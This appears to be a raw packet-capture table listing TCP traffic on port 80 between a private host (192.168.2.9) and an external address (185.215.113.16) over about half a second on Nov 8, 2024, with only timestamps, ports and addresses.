Nov 8, 2024 15:20:53.890980959 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.890994072 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.891000032 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.891005039 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.891043901 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.927684069 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.927700043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.927711964 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.927746058 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.927769899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.952334881 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952358961 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952375889 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952388048 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952400923 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952403069 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.952414036 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952420950 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.952455044 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.952649117 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952663898 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952687025 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952697992 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952711105 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.952713966 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.952747107 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.972269058 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.972311974 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.972326994 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.972337961 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.972342968 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.972359896 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.972467899 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.972479105 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.972513914 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:53.985575914 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.985589981 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.985600948 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:53.985690117 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.008310080 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008322954 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008335114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008394003 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.008577108 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008630991 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008639097 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.008641958 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008687019 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008714914 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.008723021 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008761883 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008773088 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008784056 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008786917 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.008811951 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.008814096 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.008877039 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.009123087 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009140015 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009152889 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009253025 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009392023 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.009535074 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009547949 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009557962 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009568930 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009583950 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009602070 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.009614944 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009627104 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009637117 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009641886 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.009646893 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.009663105 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.009690046 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.010077953 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.010088921 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.010099888 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.010163069 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.010163069 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.049603939 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.049741983 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.049753904 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.049813986 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.071881056 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.071897984 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.071911097 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.071948051 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.071954966 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.071969032 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.071980000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.071981907 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.071994066 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.072005987 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.072016954 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.072027922 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.072029114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.072057009 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.072057962 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.072057962 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.072168112 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.093318939 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.093465090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.093477011 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.093487978 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.093561888 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.105353117 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.105366945 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.105381012 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.105396032 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.105412006 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.105453968 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.105540037 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.127299070 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127331018 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127398968 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127417088 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127429008 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127459049 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127469063 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127523899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.127523899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.127523899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.127523899 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.127580881 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127592087 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127604008 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127676010 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.127834082 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127851009 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127863884 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127873898 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127882957 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.127887964 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.127916098 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.127966881 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.128227949 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128240108 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128252029 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128264904 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128282070 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.128315926 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.128451109 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128463030 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128473997 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128501892 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128514051 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128521919 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.128729105 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.128838062 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128907919 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128920078 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128932953 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.128967047 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.129045010 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.165647030 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.165736914 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.165749073 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.165760040 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.165771008 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.165793896 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.165827990 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.165827990 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.190416098 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190507889 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190597057 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190610886 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190622091 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190638065 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190654039 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190664053 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190675974 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190680027 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.190690041 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.190720081 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.190720081 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.190826893 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.190891981 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.210151911 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.210192919 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.210203886 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.210254908 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.210282087 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.210285902 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.223452091 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.223469973 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.223490953 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.223506927 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.223519087 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.223520994 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.223553896 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.223572016 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.223587990 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.223598957 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.223648071 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.246118069 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246134996 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246145964 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246263981 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.246345997 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246375084 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246401072 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.246442080 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246454000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246464968 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246476889 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246495008 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.246506929 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.246705055 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246730089 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246742010 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246752977 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246763945 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246772051 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.246789932 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.246822119 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246834040 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.246840000 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.246876955 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.247118950 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247154951 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247165918 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247178078 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247195005 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.247245073 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.247436047 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247453928 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247464895 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247488022 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.247644901 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247657061 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247807026 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.247854948 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247865915 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247876883 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.247905016 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.247925997 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.284363031 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.284384966 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.284399033 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.284410000 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.284466028 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.284498930 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.284512043 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.284631968 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.309499979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309525967 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309539080 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309562922 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309573889 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309587002 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309612989 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309624910 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309636116 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309645891 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.309645891 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.309645891 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.309838057 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309849024 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309859991 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309868097 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.309894085 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.309916973 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.309916973 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.329463959 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.329500914 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.329514980 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.329554081 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.329601049 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.342391014 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.342411041 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.342422962 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.342433929 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.342444897 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.342466116 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.342526913 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.364929914 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365053892 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365057945 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.365067005 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365077972 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365092039 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365113020 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.365277052 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365293980 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365303993 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365308046 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.365330935 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365345001 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365355968 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365360975 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.365390062 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.365530014 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.365606070 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365616083 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365720034 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365724087 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.365732908 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365745068 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365757942 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.365766048 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.365820885 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.366007090 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366024017 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366034985 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366070032 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366071939 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.366081953 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366202116 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.366445065 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366506100 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.366511106 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366524935 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366542101 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366552114 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366563082 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366580009 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.366646051 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.366933107 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366944075 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.366996050 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.400966883 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.403413057 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.403434992 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.403453112 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.403474092 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.403486013 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.403487921 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.403498888 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.403513908 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.403529882 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.403556108 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.403556108 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.419109106 CET	49800	80	192.168.2.9	185.215.113.16
Nov 8, 2024 15:20:54.428179979 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428208113 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428226948 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428239107 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428248882 CET	80	49800	185.215.113.16	192.168.2.9
Nov 8, 2024 15:20:54.428261995 CET	80	49800	185.215.113.16	192.168.2.9
